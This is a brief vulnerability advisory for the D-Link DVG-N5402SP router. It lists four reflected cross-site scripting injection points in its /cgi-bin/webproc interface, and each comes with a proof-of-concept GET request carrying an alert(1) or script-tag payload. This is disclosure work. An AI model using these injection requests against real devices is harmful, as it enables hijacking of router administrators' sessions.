Home / os / winmobile

D-Link DVG-N5402SP Cross Site Scripting

Posted on 23 February 2016

DLink Multiple Cross Site Scripting Vulnerabilities
Vendor : www.dlink.com
Product Model: DVG­N5402SP
Published: 02/22/2016
Discovered by vesp3r (vesp3r7c3@gmail.com)

Advisory Timeline
-----------------

02/05/2016 - Vendor notified (No response)

Vulnerability
-------------

Reflected Cross Site Scripting

1) getpage parameter

GET /cgi-bin/webproc?getpage=html/index.html&var:menu=advanced1337"%3balert(1)%2f%2f158&var:page=firewall&var:subpage=URLFilter HTTP/1.1

2) var:menu parameter

GET /cgi-bin/webproc?getpage=html/index.html&errorpage=html/main.html&var:language=zh_cn&var:menu=setup1337"%3balert(1)%2f%2f122&var:page=connected&var:retag=1&var:subpage=- HTTP/1.1

3) var:page parameter

/cgi-bin/webproc?getpage=html/index.html&var:menu=advanced&var:page=firewall9542"%3balert(1)%2f%2f198&var:subpage=dmz

4) var:subpage parameter

/cgi-bin/webproc?getpage=html/index.html&errorpage=html/main.html&var:language=zh_cn&var:menu=setup&var:page=connected&var:retag=1&var:subpage="><script>alert(1)<%2fscript>z376l HTTP/1.1

 

TOP

Malware :

Exploits :